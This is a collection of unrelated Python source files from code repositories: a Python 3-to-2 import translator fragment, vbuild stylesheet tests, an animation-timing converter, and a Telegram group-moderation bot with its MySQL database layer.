""" Fix os.getcwd -> os.getcwdu
"""
if token.type == 'identifier' and token.text == 'getcwd':
if token.next_char == '(':
token.fix = 'getcwdu'
def fix_imports(self, token):
""" import xx.yy -> import zz
"""
if token.type == 'keyword' and token.text == 'import':
tokens = token.line_tokens
# For each import case ...
for name, replacement in self.IMPORT_MAPPING.items():
parts = name.split('.')
# Walk over tokens to find start of match
for i in range(len(tokens)):
if (tokens[i].text == parts[0] and
len(tokens[i:]) >= len(parts)):
# Is it a complete match?
for j, part in enumerate(parts):
if tokens[i+j].text != part:
break
else:
# Match, marge tokens
tokens[i].end = tokens[i+len(parts)-1].end
tokens[i].fix = replacement
for j in range(1, len(parts)):
tokens[i+j].start = tokens[i].end
tokens[i+j].end = tokens[i].end
tokens[i+j].fix = ''
break # we have found the match
def fix_imports2(self, token):
""" from xx.yy import zz -> from vv import zz
"""
if token.type == 'keyword' and token.text == 'import':
tokens = token.line_tokens
# We use the fact that all imports keys consist of two names
if tokens[0].text == 'from' and len(tokens) == 5:
if tokens[3].text == 'import':
xxyy = tokens[1].text + '.' + tokens[2].text
name = tokens[4].text
if xxyy in self.IMPORT_MAPPING2:
for possible_module in self.IMPORT_MAPPING2[xxyy]:
if name in self.PY2MODULES[possible_module]:
tokens[1].fix = possible_module
tokens[1].end = tokens[2].end
tokens[2].start = tokens[2].end
break
# Map simple import paths to new import import paths
IMPORT_MAPPING = {
"reprlib": "repr",
"winreg": "_winreg",
"configparser": "ConfigParser",
"copyreg": "copy_reg",
"queue": "Queue",
"socketserver": "SocketServer",
"_markupbase": "markupbase",
"test.support": "test.test_support",
"dbm.bsd": "dbhash",
"dbm.ndbm": "dbm",
"dbm.dumb": "dumbdbm",
"dbm.gnu": "gdbm",
"html.parser": "HTMLParser",
"html.entities": "htmlentitydefs",
"http.client": "httplib",
"http.cookies": "Cookie",
"http.cookiejar": "cookielib",
"urllib.robotparser": "robotparser",
"xmlrpc.client": "xmlrpclib",
"builtins": "__builtin__",
}
# Map import paths to ... a set of possible import paths
IMPORT_MAPPING2 = {
'urllib.request': ('urllib2', 'urllib'),
'urllib.error': ('urllib2', 'urllib'),
'urllib.parse': ('urllib2', 'urllib', 'urlparse'),
'dbm.__init__': ('anydbm', 'whichdb'),
'http.server': ('CGIHTTPServer', 'SimpleHTTPServer', 'BaseHTTPServer'),
'xmlrpc.server': ('DocXMLRPCServer', 'SimpleXMLRPCServer'),
}
# This defines what names are in specific Python 2 modules
PY2MODULES = {
'urllib2' : (
'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler',
'AbstractHTTPHandler', 'BaseHandler', 'CacheFTPHandler',
'FTPHandler', 'FileHandler', 'HTTPBasicAuthHandler',
'HTTPCookieProcessor', 'HTTPDefaultErrorHandler',
'HTTPDigestAuthHandler', 'HTTPError', 'HTTPErrorProcessor',
'HTTPHandler', 'HTTPPasswordMgr',
'HTTPPasswordMgrWithDefaultRealm', 'HTTPRedirectHandler',
'HTTPSHandler', 'OpenerDirector', 'ProxyBasicAuthHandler',
'ProxyDigestAuthHandler', 'ProxyHandler', 'Request',
'StringIO', 'URLError', 'UnknownHandler', 'addinfourl',
'build_opener', 'install_opener', 'parse_http_list',
'parse_keqv_list', 'randombytes', 'request_host', 'urlopen'),
'urllib' : (
'ContentTooShortError', 'FancyURLopener', 'URLopener',
'basejoin', 'ftperrors', 'getproxies',
'getproxies_environment', 'localhost', 'pathname2url',
'quote', 'quote_plus', 'splitattr', 'splithost',
'splitnport', 'splitpasswd', 'splitport', 'splitquery',
'splittag', 'splittype', 'splituser', 'splitvalue',
'thishost', 'unquote', 'unquote_plus', 'unwrap',
'url2pathname', 'urlcleanup', 'urlencode', 'urlopen',
'urlretrieve',),
'urlparse' : (
'parse_qs', 'parse_qsl', 'urldefrag', 'urljoin',
'urlparse', 'urlsplit', 'urlunparse', 'urlunsplit'),
'dbm' : (
'ndbm', 'gnu', 'dumb'),
'anydbm' : (
'error', 'open'),
'whichdb' : (
'whichdb',),
'BaseHTTPServer' : (
'BaseHTTPRequestHandler', 'HTTPServer'),
'CGIHTTPServer' : (
'CGIHTTPRequestHandler',),
'SimpleHTTPServer' : (
'SimpleHTTPRequestHandler',),
'DocXMLRPCServer' : (
'DocCGIXMLRPCRequestHandler', 'DocXMLRPCRequestHandler',
'DocXMLRPCServer', 'ServerHTMLDoc', 'XMLRPCDocGenerator'),
}
if __name__ == '__main__':
# Awesome for testing
code = """
"""
t = LegacyPythonTranslator(code)
new_code = t.translate()
print(t.tokens)
print('---')
print(new_code)
```
|
{
"source": "JesusZerpa/vbuild",
"score": 2
}
|
#### File: vbuild/tests/test_vbuild_less.py
```python
import vbuild
import pytest
import sys
@pytest.mark.skipif(not vbuild.hasLess, reason="requires lesscpy")
def test_less():
h = """<template><div>XXX</div></template>
<Style scoped Lang = "leSS" >
body {
border-width: 2px *3;
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
assert "6px" in r.style
h = """<template><div>XXX</div></template>
<Style scoped lang="less">
body {
font: @unknown;
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
with pytest.raises(
vbuild.VBuildException
): # vbuild.VBuildException: Component 'comp.vue' got a CSS-PreProcessor trouble : Error evaluating expression:
r.style
```
#### File: vbuild/tests/test_vbuild_sass.py
```python
import vbuild
import pytest
import sys
@pytest.mark.skipif(not vbuild.hasSass, reason="requires pyScss")
def test_sass():
h = """<template><div>XXX</div></template>
<Style scoped lang="sass">
body {
font: 2px *3;
color: red + green;
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
assert "6px" in r.style
assert "#ff8000" in r.style
h = """<template><div>XXX</div></template>
<Style scoped lang="sass">
body {
font: $unknown;
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
with pytest.raises(
vbuild.VBuildException
): # vbuild.VBuildException: Component 'comp.vue' got a CSS-PreProcessor trouble : Error evaluating expression:
r.style
# ensure inline def class are OK
h = """<template><div>XXX</div></template>
<Style scoped lang="sass">
:scope {
color:blue;
div {color:red}
}
</style>"""
r = vbuild.VBuild("comp.vue", h)
assert (
r.style == """*[data-comp] {color: blue; }\n*[data-comp] div {color: red; }"""
)
```
|
{
"source": "Jesuszilla/ConvertTurbo",
"score": 3
}
|
#### File: ConvertTurbo/ConvertTurbo/ConvertTurbo.py
```python
import io
import os
import re
import sys
'''
Modify this parameter to skip 1 in x frames. In the default,
4, this would skip 1 frame every 4 frames.
So, [5,3,4,3,4,4,1] would become [4,2,3,3,3,3,0].
'''
SKIP_FRAME = 4
'''
Modify this parameter to modify the range of animations which
will be converted to turbo. The first argument is the start
animation, and the second is the end animation
'''
ANIM_RANGE = range(200,3999)
'''
Modify this parameter to specify a list of ranges to ignore.
For example, to ignore animations in [0,42] and [700,799]:
IGNORE_RANGES = [range(0,42), range(700,799)]
'''
IGNORE_RANGES = [range(700,726)]
##################################################
# DO NOT MODIFY ANYTHING BELOW #
##################################################
ANIM_BEGIN_REGEX = re.compile("\[\s*begin\s+action\s+\d+\s*\]", re.IGNORECASE)
ANIM_NUMBER_REGEX = re.compile("\d+")
NUMBER_START_REGEX = re.compile("\s*\d+")
BASE = "{0},{1}, {2},{3}, {4}\n"
BASEOPT = "{0},{1}, {2},{3}, {4}, {5}\n"
BASEOPT2 = "{0},{1}, {2},{3}, {4}, {5}, {6}\n"
BASEOPT2 = "{0},{1}, {2},{3}, {4}, {5}, {6}, {7}\n"
# Test cases
#input = [5,3,4,3,4,4,1]
#expected = [4,2,3,3,3,3,0]
#input = [4,3,4,3,4,4,1]
#expected = [3,3,3,2,3,3,1]
#input = [4,4,4,4,4,4,4]
#expected = [3,3,3,3,3,3,3]
#input = [5,4,5,4,5,4,5]
#expected = [4,3,4,3,4,3,3]
#input = [1,1,1,1,1,1,1]
#expected = [1,1,1,0,1,1,1]
def main():
if len(sys.argv) != 3:
sys.exit("Usage: ConvertTurbo.py input_file output_file")
input,output = sys.argv[1:]
with open(input,'r') as f:
with open(output,'w') as o:
currTime = 0
ignoreAnim = False
for line in f:
# Start of an animation
if ANIM_BEGIN_REGEX.match(line):
currTime = 0
anim = int(ANIM_NUMBER_REGEX.findall(line)[0])
# Should we ignore the animation?
if anim in ANIM_RANGE:
for r in IGNORE_RANGES:
ignoreAnim = anim in r
if ignoreAnim:
break
else:
ignoreAnim = True
o.write(line)
# Start of an animation element
elif NUMBER_START_REGEX.match(line) and not ignoreAnim:
data = line.split(",")
t = int(data[4])
# Only do this for positive, non-zero timings
if t > 0:
tNew = t
framesToSkip = int((currTime+t) / SKIP_FRAME)
tNew -= framesToSkip
currTime = (currTime+t)%(SKIP_FRAME)
data[4] = " " + str(tNew)
if not data[len(data)-1].endswith("\n"):
data[len(data)-1] = data[len(data)-1] + "\n"
o.write(",".join(data))
else:
o.write(line)
if __name__ == "__main__":
main()
```
|
{
"source": "jesvijonathan/Jesvi-Bot-Telegram",
"score": 2
}
|
#### File: modules/core/database.py
```python
from os import system, truncate
from re import L
from time import sleep
from config import *
from mysql import connector
def load():
db = connector.connect(
host=database_host,
user=database_user,
password=database_password,
database=database_name)
cursor = db.cursor(buffered=True)
bot_db(cursor,db)
class create_db:
# Variable Initialisation
def __init__(self):
self.db = connector.connect(
host=database_host,
user=database_user,
password=<PASSWORD>,
database=database_name)
self.cursor = self.db.cursor(buffered=True)
self.user = self.chat = None
# Table Creation
def chat_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS chat_base ( chat_id VARCHAR(14) PRIMARY KEY, type VARCHAR(14), title VARCHAR(48), username VARCHAR(48), join_date TIMESTAMP)"
) # chat_base : chat_id | type | title | username | join_date
self.cursor.execute(sql)
self.db.commit()
def user_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS user_base ( user_id VARCHAR(14) PRIMARY KEY, first_name VARCHAR(48), last_name VARCHAR(48), username VARCHAR(48), is_bot BOOLEAN, date TIMESTAMP)"
) # user_base : user_id | first_name | lastname | username | is_bot | date
self.cursor.execute(sql)
self.db.commit()
def settings_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS settings_base ( chat_id VARCHAR(14) PRIMARY KEY, members TINYINT, warn_limit TINYINT DEFAULT 3, strike_action TINYINT DEFAULT 0, disabled_commands TINYINT DEFAULT 0, filter TINYINT DEFAULT 1, notes TINYINT DEFAULT 1, chat_lock TINYINT DEFAULT 0, recent_pin TINYINT)"
) # settings_base : chat_id | members | warn_limit | strike_action | disabled_commands | filter | notes | lock | recent_pin
self.cursor.execute(sql)
self.db.commit()
def filter_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS filter_base ( id MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, chat_id VARCHAR(14), filter_word VARCHAR(32), filter_type TINYINT DEFAULT 0, response TEXT NULL, remove BOOLEAN DEFAULT 0)"
) # filter_base : id | chat_id | filter_word | filter_type | response | remove
self.cursor.execute(sql)
self.db.commit()
def notes_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS notes_base ( id MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, chat_id VARCHAR(14), note_name VARCHAR(32), note_text TEXT, set_by VARCHAR(32), date TIMESTAMP)"
) # notes_base : id | chat_id | note_name | note_text | set_by | date
self.cursor.execute(sql)
self.db.commit()
def warn_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS warn_base ( id MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, chat_id VARCHAR(14), user_id VARCHAR(14), by_user_id VARCHAR(14), message_id VARCHAR(14), reason TEXT, date TIMESTAMP)"
) # warn_base : id | chat_id | user_id | by_user_id | message_id | reason | date
self.cursor.execute(sql)
self.db.commit()
def link_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS link_base ( id MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, chat_id VARCHAR(14), user_id VARCHAR(14), status VARCHAR(14) DEFAULT 'member', bio TEXT, join_date TIMESTAMP, last_active TIMESTAMP)"
) # link_base : id | chat_id | user_id | status | bio | join_date | last_active
self.cursor.execute(sql)
self.db.commit()
def disabled_commands_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS disabled_commands_base ( id VARCHAR(14) PRIMARY KEY, chat_id VARCHAR(14), user_id VARCHAR(14), command VARCHAR(32), set_by VARCHAR(14))"
) # disabled_commands_base : id | chat_id | user_id | command | set_by
self.cursor.execute(sql)
self.db.commit()
def recent_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS recent_base ( id VARCHAR(14) PRIMARY KEY, chat_id VARCHAR(14), pin_text TEXT, message_id VARCHAR(14), pin_by VARCHAR(32), date TIMESTAMP)"
) # recent_base : id | chat_id | pin_text | message_id | pin_by | date
self.cursor.execute(sql)
self.db.commit()
def rule_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS rule_base ( chat_id VARCHAR(14) PRIMARY KEY, rule_text TEXT, rule_type VARCHAR(14), redirect BOOLEAN DEFAULT 0)"
) # rules_base : chat_id | rule_text | rule_type | redirect
self.cursor.execute(sql)
self.db.commit()
def welcome_base(self):
sql = (
"CREATE TABLE IF NOT EXISTS welcome_base ( chat_id VARCHAR(14) PRIMARY KEY, welcome_text TEXT, verification BOOLEAN DEFAULT 0, fail_action TINYINT DEFAULT 1)"
) # welcome_base : chat_id | welcome_text | verification | fail_action
self.cursor.execute(sql)
self.db.commit()
def create_base(self):
self.chat_base()
self.user_base()
self.link_base()
self.settings_base()
self.filter_base()
self.notes_base()
self.warn_base()
self.rule_base()
self.welcome_base()
try:
class bot_db:
# Variable Initialisation
def __init__(self):
self.db = connector.connect(
host=database_host,
user=database_user,
password=<PASSWORD>,
database=database_name)
self.cursor = self.db.cursor(buffered=True)
self.user = self.chat = None
def parse(self,chat,user):
self.add_user(user)
self.add_chat(chat)
self.add_link(chat, user)
def add_user(self,user):
username = user['username']
first_name = user['first_name']
last_name = user['last_name']
sql = (
"INSERT INTO user_base (user_id, username, first_name, last_name, is_bot, date) VALUE(%s, %s, %s, %s, %s, CURRENT_TIMESTAMP()) ON DUPLICATE KEY UPDATE username=%s, first_name=%s, last_name=%s")
data = (
user['id'],
username, first_name, last_name,
user['is_bot'],
username, first_name, last_name,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_user(self,user_id):
sql = (
"SELECT * FROM user_base WHERE user_id=%s"
)
data = (
user_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_chat(self,chat):
title = chat['title']
username = chat['username']
sql = (
"INSERT INTO chat_base (chat_id, type, title, username, join_date) VALUE(%s, %s, %s, %s, CURRENT_TIMESTAMP()) ON DUPLICATE KEY UPDATE title=%s, username=%s")
data = (
chat['id'], chat['type'],
title, username,
title, username
)
# print(data)
self.cursor.execute(sql, data)
self.db.commit()
def get_chat(self,chat_id=None):
if chat_id == None:
sql = (
"SELECT * FROM chat_base"
)
self.cursor.execute(sql,)
return self.cursor.fetchall()
else:
sql = (
"SELECT * FROM chat_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def update_link(self, chat, user, meth=0):
"""
if meth == 1:
sql = (
"UPDATE link_base SET status='member WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
bio, chat_id, user_id
)
self.cursor.execute(sql, data1)
self.db.commit()
"""
pass
def add_link(self,chat, user, status="member", replace=0, bio=None):
chat_id = chat['id']
user_id = user['id']
sql = (
"SELECT (1) FROM link_base WHERE chat_id=%s AND user_id=%s LIMIT 1"
)
data = (
chat_id,
user_id
)
self.cursor.execute(sql, data)
if self.cursor.fetchone():
if replace == 1:
sql1 = (
"UPDATE link_base SET status=%s, last_active=CURRENT_TIMESTAMP() WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
status, chat_id, user_id
)
elif replace == 3:
sql1 = (
"UPDATE link_base SET status=%s WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
status, chat_id, user_id
)
elif replace == 5:
sql1 = (
"UPDATE link_base SET bio=%s WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
bio, chat_id, user_id
)
else:
sql1 = (
"UPDATE link_base SET last_active=CURRENT_TIMESTAMP() WHERE chat_id=%s AND user_id= %s LIMIT 1"
)
data1 = (
chat_id, user_id
)
else:
sql1 = (
"INSERT INTO link_base (chat_id, user_id, status, join_date, last_active) VALUE(%s, %s, %s, CURRENT_TIMESTAMP(), CURRENT_TIMESTAMP())"
)
data1 = (
chat_id, user_id, status,
)
self.cursor.execute(sql1, data1)
self.db.commit()
def get_link(self,chat_id, user_id=None, comp = 0):
if comp == 1:
sql = (
"SELECT * FROM link_base WHERE chat_id=%s AND status=%s"
)
status = "administrator"
data = (
chat_id, status,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
elif user_id == None:
sql = (
"SELECT * FROM link_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
else:
sql = (
"SELECT * FROM link_base WHERE chat_id=%s AND user_id=%s"
)
data = (
chat_id, user_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_settings(self, chat_id, members=None,lock=None,filter=None,notes=None):
if lock != None:
sql = (
"INSERT INTO settings_base (chat_id, chat_lock) VALUE(%s, %s) ON DUPLICATE KEY UPDATE chat_lock=%s"
)
data = (
chat_id, lock,
lock,
)
elif filter != None:
sql = (
"INSERT INTO settings_base (chat_id, filter) VALUE(%s, %s) ON DUPLICATE KEY UPDATE filter=%s"
)
data = (
chat_id, filter,
filter,
)
elif notes != None:
sql = (
"INSERT INTO settings_base (chat_id, notes) VALUE(%s, %s) ON DUPLICATE KEY UPDATE notes=%s"
)
data = (
chat_id, notes,
notes,
)
elif members != None:
sql = (
"INSERT INTO settings_base (chat_id, members) VALUE(%s, %s) ON DUPLICATE KEY UPDATE members=%s"
)
data = (
chat_id, members,
members,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_settings(self,chat_id):
sql = (
"SELECT * FROM settings_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_note(self, chat_id, note_name, note_text, set_by):
sql = (
"REPLACE INTO notes_base (chat_id, note_name, note_text, set_by, date) VALUE(%s, %s, %s, %s, CURRENT_TIMESTAMP())"
)
data = (
chat_id, note_name, note_text, set_by,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_note(self,chat_id):
sql = (
"SELECT * FROM notes_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
def get_note_text(self,chat_id,note_name=None):
sql = (
"SELECT * FROM notes_base WHERE chat_id=%s AND note_name=%s LIMIT 1"
)
data = (
chat_id,note_name,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def remove_note(self,chat_id,note_name=None):
if note_name == '*':
sql = (
"DELETE FROM notes_base WHERE chat_id=%s"
)
data = (
chat_id,
)
else:
sql = (
"DELETE FROM notes_base WHERE chat_id=%s AND note_name=%s ORDER BY id DESC LIMIT 1"
)
data = (
chat_id,note_name,
)
self.cursor.execute(sql, data)
self.db.commit()
def add_filter(self,chat_id, word, type=0, response=None, delete=1):
sql = (
"REPLACE INTO filter_base (chat_id, filter_word, filter_type, response, remove) VALUE(%s, %s, %s, %s, %s)"
)
data = (
chat_id, word, type, response, delete,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_filter(self,chat_id):
sql = (
"SELECT * FROM filter_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
def remove_filter(self,chat_id,word):
if word == '*':
sql = (
"DELETE FROM filter_base WHERE chat_id=%s"
)
data = (
chat_id,
)
else:
sql = (
"DELETE FROM filter_base WHERE chat_id=%s AND filter_word=%s ORDER BY id DESC LIMIT 1"
)
data = (
chat_id, word,
)
self.cursor.execute(sql, data)
self.db.commit()
def add_rule(self,chat_id, rule_type, redirect, rule_text):
# rules_base : chat_id | rule_text | rule_type | redirect | set_by | date
sql = (
"REPLACE INTO rule_base (chat_id, rule_text, rule_type, redirect) VALUE(%s, %s, %s, %s)"
)
data = (
chat_id, rule_text, rule_type, redirect,
)
self.cursor.execute(sql, data)
self.db.commit()
def del_rule(self,chat_id):
# rules_base : chat_id | rule_text | rule_type | redirect | set_by | date
sql = (
"DELETE FROM rule_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_rule(self,chat_id):
sql = (
"SELECT * FROM rule_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_warn(self, chat_id, user_id, by_user_id, message_id, reason):
sql = (
"INSERT INTO warn_base (chat_id, user_id, by_user_id, message_id, reason, date) VALUE(%s, %s, %s, %s, %s, CURRENT_TIMESTAMP())"
)
data = (
chat_id, user_id, by_user_id, message_id, reason,
) # warn_base : id | chat_id | user_id | by_user_id | message_id | reason | date
self.cursor.execute(sql, data)
self.db.commit()
def get_warn(self, chat_id=None, user_id=None, list=0):
if list ==1:
sql = (
"SELECT * FROM warn_base WHERE chat_id=%s AND user_id=%s ORDER BY id"
)
data = (
chat_id, user_id,
)
elif chat_id == None:
sql = (
"SELECT *, COUNT(*) FROM warn_base WHERE user_id=%s ORDER BY id"
)
data = (
user_id,
)
elif user_id == None:
sql = (
"SELECT *, COUNT(*) FROM warn_base WHERE chat_id=%s ORDER BY id"
)
data = (
chat_id,
)
else:
sql = (
"SELECT *, COUNT(*) FROM warn_base WHERE chat_id=%s AND user_id=%s ORDER BY id"
)
data = (
chat_id, user_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchall()
def remove_warn(self, chat_id, user_id, lr=0):
if user_id == None:
sql = (
"DELETE FROM warn_base WHERE chat_id=%s"
)
data = (
chat_id,
)
else:
if lr == 0:
sql = (
"DELETE FROM warn_base WHERE chat_id=%s AND user_id=%s ORDER BY id DESC LIMIT 1"
)
elif lr == 1:
sql = (
"DELETE FROM warn_base WHERE chat_id=%s AND user_id=%s ORDER BY id ASC LIMIT 1"
)
elif lr == 2:
sql = (
"DELETE FROM warn_base WHERE chat_id=%s AND user_id=%s"
)
data = (
chat_id, user_id,
)
self.cursor.execute(sql, data)
self.db.commit()
def get_welcome(self,chat_id,user_id=None):
if user_id != None:
sql = (
"SELECT * FROM warn_base WHERE chat_id=%s AND user_id=%s"
)
data = (
chat_id, user_id,
)
else:
sql = (
"SELECT * FROM warn_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
def add_welcome(self,chat_id, welcome_text="Hello {first_name}, \nWelcome to {group_name} !"):
sql = (
"REPLACE INTO welcome_base (chat_id, welcome_text) VALUE(%s, %s)"
)
data = (
chat_id, welcome_text
)
# print(data)
self.cursor.execute(sql, data)
self.db.commit()
def get_welcome(self,chat_id):
sql = (
"SELECT * FROM welcome_base WHERE chat_id=%s"
)
data = (
chat_id,
)
self.cursor.execute(sql, data)
return self.cursor.fetchone()
except Exception as ex:
print(ex)
load()
```
|
{
"source": "jesvijonathan/Jesvi-Bot",
"score": 2
}
|
#### File: modules/core/ban.py
```python
import modules.core.extract as extract
import modules.core.database as database
import telegram
import threading
try:
from config1 import *
except:
from config import *
import time
class ban_cls():
def __init__(self,update,context) -> None:
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.tag_user_id = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.tag_user_id = self.tag_user["id"]
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.chat_id = self.chat["id"]
self.user_id = self.user["id"]
self.msg_string = self.msg.text
def ban(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
else:
n = extract.sudo_check_2(msg=self.tag_msg,context=self.context)
if n == 2:
self.msg.reply_text("Nope !")
return
elif n == 1:
self.msg.reply_text("Get another admin to do it !")
return
self.update.effective_chat.kick_member(self.tag_user_id)
self.update.message.reply_text("Banned " + self.tag_user["first_name"] + " !")
def unban(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
chat = self.update.effective_chat
chat.unban_member(self.tag_user_id)
self.update.message.reply_text("Un-banned " + self.tag_user["first_name"] + " !")
def kick(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
else:
n = extract.sudo_check_2(msg=self.tag_msg,context=self.context)
if n == 2:
self.msg.reply_text("Nope !")
return
elif n == 1:
self.msg.reply_text("Get another admin to do it !")
return
self.update.effective_chat.unban_member(self.tag_user_id)
self.update.message.reply_text("Kicked " + self.tag_user["first_name"] + " !")
def leave(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,sudo=1,context=self.context)
if m != 2 or m != 7:
if m==1:
self.msg.reply_text("'Owner only' command !")
return
msgg = self.msg.reply_text("Clearing group db befre leaving...")
time.sleep(5)
msgg.edit_text("You can add me back any time.\n Bye !")
self.update.effective_chat.unban_member(bot_id)
def rip(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=0,context=self.context)
if m == 2 or m == 1:
self.msg.reply_text("Hmm")
return
txt = self.msg.reply_text("You asked for it, any last words ?")
time.sleep(5)
self.update.effective_chat.unban_member(self.user_id)
txt.edit_text(str(self.user["first_name"]) + " got voluntarily kicked !")
def unmute(self):
if self.tag_user_id == None:
user_id = self.user_id
else:
user_id = self.tag_user_id
#current = eval(str(context.bot.getChat(chat_id).permissions))
new = {'can_send_messages': True,
'can_send_media_messages': True,
'can_send_polls': True,
'can_send_other_messages': True,
'can_add_web_page_previews': True,
'can_invite_users': True,
'can_change_info': True,
'can_pin_messages': True}
permissions = {'can_send_messages': None,
'can_send_media_messages': None,
'can_send_polls': None,
'can_send_other_messages': None,
'can_add_web_page_previews': None,
'can_invite_users': None,
'can_change_info': None,
'can_pin_messages': None}
# permissions.update(current)
permissions.update(new)
new_permissions = telegram.ChatPermissions(**permissions)
self.context.bot.restrict_chat_member(
self.chat_id, user_id, permissions=new_permissions)
def mute(self):
if self.tag_user_id == None:
user_id = self.user_id
else:
user_id = self.tag_user_id
#current = eval(str(context.bot.getChat(chat_id).permissions))
new = {'can_send_messages': False,
'can_send_media_messages': False,
'can_send_polls': False,
'can_send_other_messages': False,
'can_add_web_page_previews': False,
'can_invite_users': False,
'can_change_info': False,
'can_pin_messages': False}
permissions = {'can_send_messages': None,
'can_send_media_messages': None,
'can_send_polls': None,
'can_send_other_messages': None,
'can_add_web_page_previews': None,
'can_invite_users': None,
'can_change_info': None,
'can_pin_messages': None}
# permissions.update(current)
permissions.update(new)
new_permissions = telegram.ChatPermissions(**permissions)
self.context.bot.restrict_chat_member(
self.chat_id, user_id, permissions=new_permissions)
def router(self):
res = self.msg_string.split(None,1)
if res[0] == "/ban":
self.ban()
elif res[0] == "/unban":
self.unban()
elif res[0] == "/kick":
self.kick()
elif res[0] == "/leave":
self.leave()
elif res[0] == "/rip":
self.rip()
elif res[0] == "/mute":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.mute()
elif res[0] == "/unmute":
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m==0:
return
self.unmute()
def thread_ban(update, context):
threading.Thread(target=ban_cls(update,context).router, args=(), daemon=True).start()
```
#### File: modules/core/edit.py
```python
import modules.core.extract as extract
import modules.core.database as database
import threading
try:
from config1 import *
except:
from config import *
import time
class edit_cls():
def __init__(self,update,context) -> None:
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.tag_user_id = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.tag_user_id = self.tag_user["id"]
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.chat_id = self.chat["id"]
self.user_id = self.user["id"]
self.msg_string = self.msg.text
def pin(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
self.context.bot.pinChatMessage(self.chat_id, self.tag_msg.message_id)
def unpin(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
try:
self.context.bot.unpinChatMessage(self.chat_id)
except:
pass
def promote(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
else:
n = extract.sudo_check_2(msg=self.tag_msg,del_lvl=0,context=self.context)
if n == 2:
self.msg.reply_text(
"'I can't give where I got my powers from' ~@jesvi_bot")
return
elif n == 1:
self.msg.reply_text("Already a fellow admin !")
return
self.context.bot.promoteChatMember(int(self.chat_id), int(self.tag_user_id),
can_change_info=True,
can_delete_messages=True,
can_invite_users=True,
can_restrict_members=True,
can_pin_messages=True,
can_promote_members=False)
self.msg.reply_text("Promoted " + self.tag_user["first_name"] + " !")
def depromote(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=1,context=self.context)
if m == 0:
return
elif m == 2:
pass
else:
n = extract.sudo_check_2(msg=self.tag_msg,del_lvl=0,context=self.context)
if n == 2:
self.msg.reply_text(
"Wha- !")
return
elif n == 1:
self.msg.reply_text("Admins have to demote other admins manually..")
return
self.context.bot.promoteChatMember(int(self.chat_id), int(self.tag_user_id),
can_change_info=False,
can_delete_messages=False,
can_invite_users=False,
can_restrict_members=False,
can_pin_messages=False,
can_promote_members=False)
self.msg.reply_text("Depromoted " + str(self.tag_user["first_name"]) + " !")
